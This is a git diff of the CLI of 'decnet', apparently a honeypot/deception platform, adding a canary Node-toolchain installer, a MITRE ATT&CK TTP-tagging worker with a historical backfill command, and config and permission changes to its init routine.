return transport # type: ignore[return-value]
|
return transport
|
||||||
|
|
||||||
|
|
||||||
# ---------------------------- entry point --------------------------------
|
# ---------------------------- entry point --------------------------------
|
||||||
|
|||||||
@@ -39,6 +39,7 @@ from . import (
|
|||||||
swarm,
|
swarm,
|
||||||
swarmctl,
|
swarmctl,
|
||||||
topology,
|
topology,
|
||||||
|
ttp,
|
||||||
updater,
|
updater,
|
||||||
web,
|
web,
|
||||||
webhook,
|
webhook,
|
||||||
@@ -59,7 +60,7 @@ for _mod in (
|
|||||||
swarm,
|
swarm,
|
||||||
deploy, lifecycle, workers, inventory,
|
deploy, lifecycle, workers, inventory,
|
||||||
web, profiler, orchestrator, realism, reconciler, sniffer, db,
|
web, profiler, orchestrator, realism, reconciler, sniffer, db,
|
||||||
topology, bus, geoip, init, webhook, canary,
|
topology, bus, geoip, init, webhook, canary, ttp,
|
||||||
):
|
):
|
||||||
_mod.register(app)
|
_mod.register(app)
|
||||||
|
|
||||||
|
|||||||
@@ -1,8 +1,13 @@
|
|||||||
"""``decnet canary`` — HTTP + DNS callback receiver for canary tokens.
|
"""``decnet canary`` — HTTP + DNS callback receiver for canary tokens.
|
||||||
|
|
||||||
Worker process. Mirrors the shape of :mod:`decnet.cli.webhook`: a
|
Two entry points share this module:
|
||||||
``@app.command(name="canary")`` Typer entry point that delegates to
|
|
||||||
:func:`decnet.canary.worker.run`.
|
* ``decnet canary`` — runs the worker process. Mirrors the shape of
|
||||||
|
:mod:`decnet.cli.webhook`. Invoked by the ``decnet-canary.service``
|
||||||
|
systemd unit so its argv must stay stable.
|
||||||
|
* ``decnet canary-install-toolchain`` — provisions the Node side of
|
||||||
|
the fingerprint-canary obfuscator. Idempotent; safe to call from
|
||||||
|
the API service unit's ``ExecStartPre``.
|
||||||
|
|
||||||
Not master-only — any host that hosts deckies can run its own
|
Not master-only — any host that hosts deckies can run its own
|
||||||
canary worker (the bus events stay local; the webhook worker on
|
canary worker (the bus events stay local; the webhook worker on
|
||||||
@@ -11,11 +16,17 @@ in ``development/let-s-move-to-the-enumerated-pike.md``).
|
|||||||
"""
|
"""
|
||||||
from __future__ import annotations
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import shutil
|
||||||
|
import subprocess # nosec B404 — npm exec is the whole point of the toolchain installer
|
||||||
|
from pathlib import Path
|
||||||
|
|
||||||
import typer
|
import typer
|
||||||
|
|
||||||
from . import utils as _utils
|
from . import utils as _utils
|
||||||
from .utils import console, log
|
from .utils import console, log
|
||||||
|
|
||||||
|
_TOOLCHAIN_TIMEOUT_S = 180
|
||||||
|
|
||||||
|
|
||||||
def register(app: typer.Typer) -> None:
|
def register(app: typer.Typer) -> None:
|
||||||
@app.command(name="canary")
|
@app.command(name="canary")
|
||||||
@@ -40,3 +51,53 @@ def register(app: typer.Typer) -> None:
|
|||||||
asyncio.run(run())
|
asyncio.run(run())
|
||||||
except KeyboardInterrupt:
|
except KeyboardInterrupt:
|
||||||
console.print("\n[yellow]Canary worker stopped.[/]")
|
console.print("\n[yellow]Canary worker stopped.[/]")
|
||||||
|
|
||||||
|
@app.command(name="canary-install-toolchain")
def canary_install_toolchain(
    npm_bin: str = typer.Option(
        "npm", "--npm-bin", help="Path to the npm executable. Defaults to PATH lookup.",
    ),
) -> None:
    """Install the Node-side toolchain used by fingerprint canaries.

    Runs ``npm install --omit=dev`` under the installed ``decnet/canary/``
    directory so the obfuscator's helper script can ``require()``
    ``javascript-obfuscator`` at mint time. Requires Node >= 18.

    Idempotent: re-running on an already-installed tree is fast
    (npm short-circuits when ``node_modules/`` is up-to-date).
    """
    # NOTE: the docstring above is kept verbatim; Typer surfaces it as the
    # command's --help text.
    import decnet.canary as _canary_pkg

    # npm runs in the directory of the installed decnet.canary package.
    pkg_root = Path(_canary_pkg.__file__).resolve().parent

    # Precondition 1: the package must ship its package.json.
    manifest = pkg_root / "package.json"
    if not manifest.is_file():
        console.print(
            f"[red]canary package.json not found under {pkg_root}; "
            "wheel may be missing the JS toolchain payload.[/]"
        )
        raise typer.Exit(code=2)

    # Precondition 2: the requested npm executable must be resolvable.
    if shutil.which(npm_bin) is None:
        console.print(
            f"[red]npm executable {npm_bin!r} not found on PATH. "
            "Install Node >= 18 and re-run.[/]"
        )
        raise typer.Exit(code=2)

    console.print(
        f"[cyan]installing canary toolchain[/] in {pkg_root}",
    )

    argv = [npm_bin, "install", "--omit=dev", "--no-fund", "--no-audit"]
    try:
        result = subprocess.run(  # nosec B603 — argv-form, no shell, fixed cwd, npm_bin checked above
            argv,
            cwd=str(pkg_root),
            capture_output=True, text=True,
            timeout=_TOOLCHAIN_TIMEOUT_S, check=False,
        )
    except subprocess.TimeoutExpired:
        console.print("[red]npm install timed out after 3 minutes[/]")
        raise typer.Exit(code=3) from None

    # check=False above: a non-zero exit is reported here and re-used as
    # this command's own exit code.
    if result.returncode != 0:
        console.print(
            f"[red]npm install failed rc={result.returncode}[/]\n"
            f"{result.stderr.strip()}"
        )
        raise typer.Exit(code=result.returncode)

    console.print("[green]canary toolchain ready[/]")
|
||||||
|
|||||||
@@ -30,6 +30,10 @@ MASTER_ONLY_COMMANDS: frozenset[str] = frozenset({
|
|||||||
"mutate", "listener", "profiler",
|
"mutate", "listener", "profiler",
|
||||||
"services", "distros", "correlate", "archetypes", "web",
|
"services", "distros", "correlate", "archetypes", "web",
|
||||||
"db-reset", "init", "webhook", "clusterer", "campaign-clusterer",
|
"db-reset", "init", "webhook", "clusterer", "campaign-clusterer",
|
||||||
|
# `ttp` runs on agents — local SMTP decoys persist .eml files into the
|
||||||
|
# agent's artifacts tree and the EmailLifter disk-reaches them in-process
|
||||||
|
# (DEBT-047). `ttp-backfill` stays master-only: it walks the master DB.
|
||||||
|
"ttp-backfill",
|
||||||
})
|
})
|
||||||
MASTER_ONLY_GROUPS: frozenset[str] = frozenset(
|
MASTER_ONLY_GROUPS: frozenset[str] = frozenset(
|
||||||
{"swarm", "topology", "geoip", "realism"}
|
{"swarm", "topology", "geoip", "realism"}
|
||||||
@@ -65,7 +69,7 @@ def _gate_commands_by_mode(_app: typer.Typer) -> None:
|
|||||||
return
|
return
|
||||||
_app.registered_commands = [
|
_app.registered_commands = [
|
||||||
c for c in _app.registered_commands
|
c for c in _app.registered_commands
|
||||||
if (c.name or c.callback.__name__) not in MASTER_ONLY_COMMANDS
|
if (c.name or (c.callback.__name__ if c.callback else "")) not in MASTER_ONLY_COMMANDS
|
||||||
]
|
]
|
||||||
_app.registered_groups = [
|
_app.registered_groups = [
|
||||||
g for g in _app.registered_groups
|
g for g in _app.registered_groups
|
||||||
|
|||||||
@@ -44,6 +44,12 @@ _CONFIG_PLACEHOLDER = """\
|
|||||||
# EnvironmentFile= — never in a group-readable INI.
|
# EnvironmentFile= — never in a group-readable INI.
|
||||||
|
|
||||||
[decnet]
|
[decnet]
|
||||||
|
# DECNET-service user/group as configured at `decnet init` time.
|
||||||
|
# Resolved to a uid/gid on each host at deploy time via pwd.getpwnam,
|
||||||
|
# so the same user name can have different numeric uids on master vs
|
||||||
|
# agents without breaking artifact ownership.
|
||||||
|
api-user = {api_user}
|
||||||
|
api-group = {api_group}
|
||||||
# mode = master # or "agent"
|
# mode = master # or "agent"
|
||||||
|
|
||||||
# [api]
|
# [api]
|
||||||
@@ -74,6 +80,7 @@ _CONFIG_PLACEHOLDER = """\
|
|||||||
# master-host = 10.0.0.1
|
# master-host = 10.0.0.1
|
||||||
# syslog-port = 6514
|
# syslog-port = 6514
|
||||||
# swarmctl-port = 8770
|
# swarmctl-port = 8770
|
||||||
|
# swarmctl-host = 127.0.0.1
|
||||||
|
|
||||||
# [logging]
|
# [logging]
|
||||||
# system-log = /var/log/decnet/decnet.system.log
|
# system-log = /var/log/decnet/decnet.system.log
|
||||||
@@ -197,14 +204,17 @@ def _ensure_dir(
|
|||||||
return f"skip: {path} already present" if existed else "ok"
|
return f"skip: {path} already present" if existed else "ok"
|
||||||
|
|
||||||
|
|
||||||
def _ensure_config(path: Path, group: str, *, dry_run: bool) -> str:
|
def _ensure_config(
|
||||||
|
path: Path, group: str, *, user: str, dry_run: bool,
|
||||||
|
) -> str:
|
||||||
if path.exists():
|
if path.exists():
|
||||||
return f"skip: {path} already present"
|
return f"skip: {path} already present"
|
||||||
if dry_run:
|
if dry_run:
|
||||||
console.print(f" [dim]would write:[/] {path}")
|
console.print(f" [dim]would write:[/] {path}")
|
||||||
return "ok"
|
return "ok"
|
||||||
path.parent.mkdir(parents=True, exist_ok=True)
|
path.parent.mkdir(parents=True, exist_ok=True)
|
||||||
path.write_text(_CONFIG_PLACEHOLDER)
|
rendered = _CONFIG_PLACEHOLDER.format(api_user=user, api_group=group)
|
||||||
|
path.write_text(rendered)
|
||||||
try:
|
try:
|
||||||
os.chmod(path, 0o640)
|
os.chmod(path, 0o640)
|
||||||
gid = grp.getgrnam(group).gr_gid
|
gid = grp.getgrnam(group).gr_gid
|
||||||
@@ -601,7 +611,7 @@ def register(app: typer.Typer) -> None:
|
|||||||
# (Path("/"). / "/opt/decnet" == Path("/opt/decnet"), dropping pfx).
|
# (Path("/"). / "/opt/decnet" == Path("/opt/decnet"), dropping pfx).
|
||||||
_install_rel = install_dir.lstrip("/")
|
_install_rel = install_dir.lstrip("/")
|
||||||
|
|
||||||
required_tools = ("systemctl",) if deinit else (
|
required_tools: tuple[str, ...] = ("systemctl",) if deinit else (
|
||||||
"systemctl", "useradd", "groupadd", "systemd-tmpfiles",
|
"systemctl", "useradd", "groupadd", "systemd-tmpfiles",
|
||||||
)
|
)
|
||||||
if deinit:
|
if deinit:
|
||||||
@@ -658,7 +668,7 @@ def register(app: typer.Typer) -> None:
|
|||||||
)
|
)
|
||||||
_step(
|
_step(
|
||||||
"systemctl daemon-reload",
|
"systemctl daemon-reload",
|
||||||
lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1],
|
lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1], # type: ignore[func-returns-value]
|
||||||
)
|
)
|
||||||
_step(
|
_step(
|
||||||
f"remove {etc_decnet / 'decnet.ini'}",
|
f"remove {etc_decnet / 'decnet.ini'}",
|
||||||
@@ -754,6 +764,13 @@ def register(app: typer.Typer) -> None:
|
|||||||
(pfx / _install_rel, 0o755, user, group),
|
(pfx / _install_rel, 0o755, user, group),
|
||||||
(pfx / "var/lib/decnet", 0o750, user, group),
|
(pfx / "var/lib/decnet", 0o750, user, group),
|
||||||
(pfx / "var/lib/decnet/geoip", 0o755, user, group),
|
(pfx / "var/lib/decnet/geoip", 0o755, user, group),
|
||||||
|
# DEBT-035 / DEBT-047: artifact root carries setgid (the
|
||||||
|
# 0o2... bit) so every file written under it inherits the
|
||||||
|
# decnet group regardless of which container's uid created
|
||||||
|
# it. Group-write (0o2775) lets the API process and the
|
||||||
|
# local TTP worker read each other's outputs without a
|
||||||
|
# manual chown after every fresh deploy.
|
||||||
|
(pfx / "var/lib/decnet/artifacts", 0o2775, user, group),
|
||||||
(pfx / "var/log/decnet", 0o750, user, group),
|
(pfx / "var/log/decnet", 0o750, user, group),
|
||||||
(etc_decnet, 0o755, "root", group),
|
(etc_decnet, 0o755, "root", group),
|
||||||
(pfx / "run/decnet", 0o755, "root", group),
|
(pfx / "run/decnet", 0o755, "root", group),
|
||||||
@@ -775,12 +792,15 @@ def register(app: typer.Typer) -> None:
|
|||||||
for path, mode, d_owner, d_group in dirs:
|
for path, mode, d_owner, d_group in dirs:
|
||||||
_step(
|
_step(
|
||||||
f"ensure dir {path}",
|
f"ensure dir {path}",
|
||||||
lambda p=path, m=mode, o=d_owner, g=d_group:
|
lambda p=path, m=mode, o=d_owner, g=d_group: # type: ignore[misc]
|
||||||
_ensure_dir(p, mode=m, owner=o, group=g, dry_run=dry_run),
|
_ensure_dir(p, mode=m, owner=o, group=g, dry_run=dry_run),
|
||||||
)
|
)
|
||||||
_step(
|
_step(
|
||||||
f"write {etc_decnet / 'decnet.ini'}",
|
f"write {etc_decnet / 'decnet.ini'}",
|
||||||
lambda: _ensure_config(etc_decnet / "decnet.ini", group, dry_run=dry_run),
|
lambda: _ensure_config(
|
||||||
|
etc_decnet / "decnet.ini", group,
|
||||||
|
user=user, dry_run=dry_run,
|
||||||
|
),
|
||||||
)
|
)
|
||||||
_step(
|
_step(
|
||||||
"install systemd units",
|
"install systemd units",
|
||||||
@@ -812,7 +832,7 @@ def register(app: typer.Typer) -> None:
|
|||||||
)
|
)
|
||||||
_step(
|
_step(
|
||||||
"systemctl daemon-reload",
|
"systemctl daemon-reload",
|
||||||
lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1],
|
lambda: (_run(["systemctl", "daemon-reload"], dry_run=dry_run), "ok")[1], # type: ignore[func-returns-value]
|
||||||
)
|
)
|
||||||
|
|
||||||
if no_start:
|
if no_start:
|
||||||
@@ -823,7 +843,7 @@ def register(app: typer.Typer) -> None:
|
|||||||
_step(
|
_step(
|
||||||
"systemctl enable --now decnet.target",
|
"systemctl enable --now decnet.target",
|
||||||
lambda: (
|
lambda: (
|
||||||
_run(
|
_run( # type: ignore[func-returns-value]
|
||||||
["systemctl", "enable", "--now", "decnet.target"],
|
["systemctl", "enable", "--now", "decnet.target"],
|
||||||
dry_run=dry_run,
|
dry_run=dry_run,
|
||||||
),
|
),
|
||||||
|
|||||||
@@ -16,8 +16,16 @@ from .utils import console, log
|
|||||||
def register(app: typer.Typer) -> None:
|
def register(app: typer.Typer) -> None:
|
||||||
@app.command()
|
@app.command()
|
||||||
def swarmctl(
|
def swarmctl(
|
||||||
port: int = typer.Option(8770, "--port", help="Port for the swarm controller"),
|
port: int = typer.Option(
|
||||||
host: str = typer.Option("127.0.0.1", "--host", help="Bind address for the swarm controller"),
|
8770, "--port",
|
||||||
|
envvar="DECNET_SWARMCTL_PORT",
|
||||||
|
help="Port for the swarm controller. Defaults to [swarm] swarmctl-port from /etc/decnet/decnet.ini, else 8770.",
|
||||||
|
),
|
||||||
|
host: str = typer.Option(
|
||||||
|
"127.0.0.1", "--host",
|
||||||
|
envvar="DECNET_SWARMCTL_HOST",
|
||||||
|
help="Bind address for the swarm controller. Defaults to [swarm] swarmctl-host from /etc/decnet/decnet.ini, else 127.0.0.1.",
|
||||||
|
),
|
||||||
daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
|
daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
|
||||||
no_listener: bool = typer.Option(False, "--no-listener", help="Do not auto-spawn the syslog-TLS listener alongside swarmctl"),
|
no_listener: bool = typer.Option(False, "--no-listener", help="Do not auto-spawn the syslog-TLS listener alongside swarmctl"),
|
||||||
tls: bool = typer.Option(False, "--tls", help="Serve over HTTPS with mTLS (required for cross-host worker heartbeats)"),
|
tls: bool = typer.Option(False, "--tls", help="Serve over HTTPS with mTLS (required for cross-host worker heartbeats)"),
|
||||||
|
|||||||
@@ -233,8 +233,8 @@ def _delete(
|
|||||||
topo = await repo.get_topology(topology_id)
|
topo = await repo.get_topology(topology_id)
|
||||||
if topo is None:
|
if topo is None:
|
||||||
return False, "not-found"
|
return False, "not-found"
|
||||||
if topo["status"] in _RUNNING:
|
if topo.status in _RUNNING:
|
||||||
return False, str(topo["status"])
|
return False, str(topo.status)
|
||||||
ok = await repo.delete_topology_cascade(topology_id)
|
ok = await repo.delete_topology_cascade(topology_id)
|
||||||
return ok, None
|
return ok, None
|
||||||
|
|
||||||
|
|||||||
309
decnet/cli/ttp.py
Normal file
309
decnet/cli/ttp.py
Normal file
@@ -0,0 +1,309 @@
|
|||||||
|
"""``decnet ttp`` — TTP-tagging worker and admin commands.
|
||||||
|
|
||||||
|
Two flat commands share this module:
|
||||||
|
|
||||||
|
* ``decnet ttp`` — runs the long-running tagger worker. Bus-woken on
|
||||||
|
``attacker.session.ended`` / ``attacker.observed`` /
|
||||||
|
``attacker.intel.enriched`` / ``identity.{formed,merged}`` /
|
||||||
|
``credential.reuse.detected`` / ``email.received`` / ``canary.>``;
|
||||||
|
dispatches each event through :class:`CompositeTagger` (RuleEngine +
|
||||||
|
Behavioral / Intel / CanaryFingerprint / Email / Identity / Credential
|
||||||
|
lifters), persists ``ttp_tag`` rows via the idempotent
|
||||||
|
``INSERT OR IGNORE`` write, and publishes ``ttp.tagged`` +
|
||||||
|
``ttp.rule.fired.<technique_id>`` only when the insert returned a
|
||||||
|
non-zero rowcount (loop-prevention invariant from TTP_TAGGING.md
|
||||||
|
§"Bus topics"). Invoked by the ``decnet-ttp.service`` systemd unit
|
||||||
|
so its argv must stay stable.
|
||||||
|
|
||||||
|
* ``decnet ttp-backfill`` — replays historical events (shell commands
|
||||||
|
recorded on :class:`Attacker.commands`, :class:`CanaryTrigger` rows)
|
||||||
|
through the live tagger. Writes ``ttp_tag`` rows using the same
|
||||||
|
idempotent insert path. **Does not publish** to the bus — replay must
|
||||||
|
not re-trigger SIEM/webhook fan-out on already-attributed events.
|
||||||
|
|
||||||
|
Only ``ttp-backfill`` is master-only — gated via ``MASTER_ONLY_COMMANDS`` in
|
||||||
|
:mod:`decnet.cli.gating`. ``decnet ttp`` itself also runs on agents.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import asyncio
|
||||||
|
import time
|
||||||
|
from datetime import datetime, timedelta, timezone
|
||||||
|
from typing import Any
|
||||||
|
|
||||||
|
import typer
|
||||||
|
|
||||||
|
from decnet.ttp.factory import CompositeTagger, get_tagger
|
||||||
|
|
||||||
|
from . import utils as _utils
|
||||||
|
from .utils import console, log
|
||||||
|
|
||||||
|
|
||||||
|
_BACKFILL_SOURCES = ("command", "canary", "all")
|
||||||
|
|
||||||
|
|
||||||
|
def register(app: typer.Typer) -> None:
    """Attach the ``ttp`` and ``ttp-backfill`` commands to *app*."""

    @app.command(name="ttp")
    def ttp(
        poll_interval_secs: float = typer.Option(
            60.0, "--poll-interval", "-i",
            help="Slow-tick fallback when the bus is idle or unavailable (seconds)",
        ),
        daemon: bool = typer.Option(
            False, "--daemon", "-d",
            help="Detach to background as a daemon process",
        ),
    ) -> None:
        """TTP-tagging worker — MITRE ATT&CK technique tagging."""
        # Deferred imports: only pulled in when the command actually runs.
        from decnet.ttp.worker import run_ttp_worker_loop
        from decnet.web.dependencies import repo

        if daemon:
            log.info("ttp daemonizing poll=%s", poll_interval_secs)
            _utils._daemonize()

        log.info("ttp command invoked poll=%s", poll_interval_secs)
        banner = f"[bold cyan]TTP tagging worker starting[/] poll={poll_interval_secs}s"
        console.print(banner)
        console.print("[dim]Press Ctrl+C to stop[/]")

        async def _serve() -> None:
            # Initialise the repository, then hand control to the worker loop.
            await repo.initialize()
            await run_ttp_worker_loop(
                repo, poll_interval_secs=poll_interval_secs,
            )

        try:
            asyncio.run(_serve())
        except KeyboardInterrupt:
            console.print("\n[yellow]TTP tagging worker stopped.[/]")

    @app.command(name="ttp-backfill")
    def ttp_backfill(
        since_days: int = typer.Option(
            7, "--since-days", "-s",
            min=1, max=3650,
            help="Replay events whose source row is newer than N days ago.",
        ),
        source: str = typer.Option(
            "all", "--source",
            help=f"Source slice to replay. One of: {', '.join(_BACKFILL_SOURCES)}.",
        ),
        dry_run: bool = typer.Option(
            False, "--dry-run",
            help="Run the tagger but skip insert_tags. Reports counts only.",
        ),
        batch_size: int = typer.Option(
            500, "--batch-size",
            min=1, max=100_000,
            help="Number of tags accumulated before each repo.insert_tags call.",
        ),
    ) -> None:
        """Replay historical attacker activity through the live tagger.

        Walks ``Attacker.commands`` (per-IP shell-command history) and
        ``CanaryTrigger`` (canary callback log) since N days ago,
        builds the same :class:`TaggerEvent` shape the live worker
        emits, and persists tags via the idempotent INSERT OR IGNORE
        write. Re-running is safe — a second pass over identical
        source rows reports ``inserted=0``.

        Bus publish is intentionally suppressed; SIEM / webhook fan-out
        sees only live events, never replays.
        """
        from decnet.cli.gating import _require_master_mode
        from decnet.web.dependencies import repo

        # Mode gate comes first, before any argument validation.
        _require_master_mode("ttp-backfill")

        if source not in _BACKFILL_SOURCES:
            console.print(
                f"[red]invalid --source {source!r}; expected one of "
                f"{_BACKFILL_SOURCES}[/]"
            )
            raise typer.Exit(code=2)

        window = timedelta(days=since_days)
        cutoff = datetime.now(tz=timezone.utc) - window
        console.print(
            f"[bold cyan]TTP backfill[/] since={cutoff.isoformat()} "
            f"source={source} dry_run={dry_run} batch_size={batch_size}"
        )
        selected_sources = _resolve_sources(source)

        async def _replay() -> None:
            # Initialise the repository, then run the per-source replay.
            await repo.initialize()
            await _backfill(
                repo,
                cutoff=cutoff,
                sources=selected_sources,
                dry_run=dry_run,
                batch_size=batch_size,
            )

        try:
            asyncio.run(_replay())
        except KeyboardInterrupt:
            console.print("\n[yellow]Backfill interrupted.[/]")
|
||||||
|
|
||||||
|
|
||||||
|
def _resolve_sources(name: str) -> tuple[str, ...]:
|
||||||
|
if name == "all":
|
||||||
|
return ("command", "canary")
|
||||||
|
return (name,)
|
||||||
|
|
||||||
|
|
||||||
|
async def _backfill(
|
||||||
|
repo: Any,
|
||||||
|
*,
|
||||||
|
cutoff: datetime,
|
||||||
|
sources: tuple[str, ...],
|
||||||
|
dry_run: bool,
|
||||||
|
batch_size: int,
|
||||||
|
) -> None:
|
||||||
|
"""Drive the per-source backfill loops and report structured counts.
|
||||||
|
|
||||||
|
One :class:`CompositeTagger` is built once and reused for every
|
||||||
|
source — the per-lifter watch fan-out the live worker performs is
|
||||||
|
inlined here as a ``watch_store()`` startup task per
|
||||||
|
:class:`WatchableTagger`, so the dispatch indexes hydrate before
|
||||||
|
we start feeding events.
|
||||||
|
"""
|
||||||
|
# Import-time bound so tests can monkeypatch ``decnet.cli.ttp.get_tagger``
|
||||||
|
# to inject a recording fake without touching the global factory.
|
||||||
|
tagger = get_tagger()
|
||||||
|
watch_tasks: list[asyncio.Task[None]] = []
|
||||||
|
if isinstance(tagger, CompositeTagger):
|
||||||
|
for watchable in tagger.iter_watchables():
|
||||||
|
watch_tasks.append(asyncio.create_task(watchable.watch_store()))
|
||||||
|
# Sleep briefly so each watch_store gets a chance to run its
|
||||||
|
# initial `load_compiled` before we feed the first event.
|
||||||
|
await asyncio.sleep(0.05)
|
||||||
|
|
||||||
|
try:
|
||||||
|
if "command" in sources:
|
||||||
|
await _backfill_commands(
|
||||||
|
repo, tagger, cutoff=cutoff,
|
||||||
|
dry_run=dry_run, batch_size=batch_size,
|
||||||
|
)
|
||||||
|
if "canary" in sources:
|
||||||
|
await _backfill_canaries(
|
||||||
|
repo, tagger, cutoff=cutoff,
|
||||||
|
dry_run=dry_run, batch_size=batch_size,
|
||||||
|
)
|
||||||
|
finally:
|
||||||
|
for task in watch_tasks:
|
||||||
|
task.cancel()
|
||||||
|
for task in watch_tasks:
|
||||||
|
try:
|
||||||
|
await task
|
||||||
|
except (asyncio.CancelledError, Exception): # noqa: BLE001
|
||||||
|
pass
|
||||||
|
|
||||||
|
|
||||||
|
async def _backfill_commands(
|
||||||
|
repo: Any,
|
||||||
|
tagger: Any,
|
||||||
|
*,
|
||||||
|
cutoff: datetime,
|
||||||
|
dry_run: bool,
|
||||||
|
batch_size: int,
|
||||||
|
) -> None:
|
||||||
|
from decnet.ttp.base import TaggerEvent
|
||||||
|
|
||||||
|
started = time.monotonic()
|
||||||
|
rows_seen = 0
|
||||||
|
cmds_seen = 0
|
||||||
|
inserted = 0
|
||||||
|
pending: list[Any] = []
|
||||||
|
|
||||||
|
async for attacker, commands in repo.iter_attacker_commands_since(cutoff):
|
||||||
|
rows_seen += 1
|
||||||
|
for idx, cmd in enumerate(commands):
|
||||||
|
cmds_seen += 1
|
||||||
|
text = cmd.get("command_text") or cmd.get("text")
|
||||||
|
if not isinstance(text, str):
|
||||||
|
continue
|
||||||
|
cmd_id = (
|
||||||
|
cmd.get("id")
|
||||||
|
or cmd.get("uuid")
|
||||||
|
or cmd.get("command_id")
|
||||||
|
or f"{attacker.uuid}#cmd{idx}"
|
||||||
|
)
|
||||||
|
event = TaggerEvent(
|
||||||
|
source_kind="command",
|
||||||
|
source_id=str(cmd_id),
|
||||||
|
attacker_uuid=attacker.uuid,
|
||||||
|
identity_uuid=getattr(attacker, "identity_id", None),
|
||||||
|
session_id=cmd.get("session_id"),
|
||||||
|
decky_id=cmd.get("decky_id") or cmd.get("decky"),
|
||||||
|
payload={**cmd, "command_text": text},
|
||||||
|
)
|
||||||
|
tags = await tagger.tag(event)
|
||||||
|
if tags:
|
||||||
|
pending.extend(tags)
|
||||||
|
if len(pending) >= batch_size:
|
||||||
|
inserted += await _flush(repo, pending, dry_run)
|
||||||
|
pending = []
|
||||||
|
if pending:
|
||||||
|
inserted += await _flush(repo, pending, dry_run)
|
||||||
|
elapsed = time.monotonic() - started
|
||||||
|
console.print(
|
||||||
|
f"source=command rows={rows_seen} commands={cmds_seen} "
|
||||||
|
f"inserted={inserted} dry_run={dry_run} elapsed_s={elapsed:.2f}"
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
async def _backfill_canaries(
|
||||||
|
repo: Any,
|
||||||
|
tagger: Any,
|
||||||
|
*,
|
||||||
|
cutoff: datetime,
|
||||||
|
dry_run: bool,
|
||||||
|
batch_size: int,
|
||||||
|
) -> None:
|
||||||
|
from decnet.ttp.base import TaggerEvent
|
||||||
|
|
||||||
|
started = time.monotonic()
|
||||||
|
rows_seen = 0
|
||||||
|
inserted = 0
|
||||||
|
pending: list[Any] = []
|
||||||
|
|
||||||
|
async for trigger in repo.iter_canary_triggers_since(cutoff):
|
||||||
|
rows_seen += 1
|
||||||
|
event = TaggerEvent(
|
||||||
|
source_kind="canary_fingerprint",
|
||||||
|
source_id=trigger.uuid,
|
||||||
|
attacker_uuid=trigger.attacker_id,
|
||||||
|
identity_uuid=None,
|
||||||
|
session_id=None,
|
||||||
|
decky_id=None,
|
||||||
|
payload={
|
||||||
|
"token_uuid": trigger.token_uuid,
|
||||||
|
"src_ip": trigger.src_ip,
|
||||||
|
"ua_signature": trigger.user_agent or "",
|
||||||
|
"user_agent": trigger.user_agent,
|
||||||
|
"request_path": trigger.request_path,
|
||||||
|
"dns_qname": trigger.dns_qname,
|
||||||
|
"headers": trigger.headers(),
|
||||||
|
},
|
||||||
|
)
|
||||||
|
tags = await tagger.tag(event)
|
||||||
|
if tags:
|
||||||
|
pending.extend(tags)
|
||||||
|
if len(pending) >= batch_size:
|
||||||
|
inserted += await _flush(repo, pending, dry_run)
|
||||||
|
pending = []
|
||||||
|
if pending:
|
||||||
|
inserted += await _flush(repo, pending, dry_run)
|
||||||
|
elapsed = time.monotonic() - started
|
||||||
|
console.print(
|
||||||
|
f"source=canary rows={rows_seen} inserted={inserted} "
|
||||||
|
f"dry_run={dry_run} elapsed_s={elapsed:.2f}"
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
async def _flush(repo: Any, tags: list[Any], dry_run: bool) -> int:
|
||||||
|
if dry_run:
|
||||||
|
return 0
|
||||||
|
return int(await repo.insert_tags(tags))
|
||||||
@@ -11,7 +11,7 @@ import signal
|
|||||||
import subprocess # nosec B404
|
import subprocess # nosec B404
|
||||||
import sys
|
import sys
|
||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
from typing import Optional
|
from typing import Any, Callable, Optional
|
||||||
|
|
||||||
import typer
|
import typer
|
||||||
from rich.console import Console
|
from rich.console import Console
|
||||||
@@ -96,7 +96,7 @@ def _is_running(match_fn) -> int | None:
|
|||||||
return None
|
return None
|
||||||
|
|
||||||
|
|
||||||
def _service_registry(log_file: str) -> list[tuple[str, callable, list[str]]]:
|
def _service_registry(log_file: str) -> list[tuple[str, Callable[..., Any], list[str]]]:
|
||||||
"""Return the microservice registry for health-check and relaunch.
|
"""Return the microservice registry for health-check and relaunch.
|
||||||
|
|
||||||
On agents these run as systemd units invoking /usr/local/bin/decnet,
|
On agents these run as systemd units invoking /usr/local/bin/decnet,
|
||||||
@@ -195,7 +195,7 @@ _DEFAULT_SWARMCTL_URL = "http://127.0.0.1:8770"
|
|||||||
|
|
||||||
|
|
||||||
def _swarmctl_base_url(url: Optional[str]) -> str:
|
def _swarmctl_base_url(url: Optional[str]) -> str:
|
||||||
return url or os.environ.get("DECNET_SWARMCTL_URL", _DEFAULT_SWARMCTL_URL)
|
return url or os.environ.get("DECNET_SWARMCTL_URL") or _DEFAULT_SWARMCTL_URL
|
||||||
|
|
||||||
|
|
||||||
def _http_request(method: str, url: str, *, json_body: Optional[dict] = None, timeout: float = 30.0):
|
def _http_request(method: str, url: str, *, json_body: Optional[dict] = None, timeout: float = 30.0):
|
||||||
|
|||||||
@@ -192,6 +192,70 @@ def register(app: typer.Typer) -> None:
|
|||||||
except KeyboardInterrupt:
|
except KeyboardInterrupt:
|
||||||
console.print("\n[yellow]Reuse correlator stopped.[/]")
|
console.print("\n[yellow]Reuse correlator stopped.[/]")
|
||||||
|
|
||||||
|
@app.command(name="attribution")
|
||||||
|
def attribution(
|
||||||
|
multi_actor_tick_secs: float = typer.Option(
|
||||||
|
60.0, "--multi-actor-tick", "-t",
|
||||||
|
help=(
|
||||||
|
"Cross-primitive multi_actor correlator tick interval (seconds). "
|
||||||
|
"Walks attribution_state for identities flagged on >= 2 "
|
||||||
|
"primitives and emits attribution.profile.multi_actor_suspected."
|
||||||
|
),
|
||||||
|
),
|
||||||
|
daemon: bool = typer.Option(
|
||||||
|
False, "--daemon", "-d",
|
||||||
|
help="Detach to background as a daemon process",
|
||||||
|
),
|
||||||
|
) -> None:
|
||||||
|
"""Attribution engine v0 — per-(identity, primitive) state machine.
|
||||||
|
|
||||||
|
Subscribes to ``attacker.observation.>`` and, for each event,
|
||||||
|
ensures a stub identity row, runs the merger over the full
|
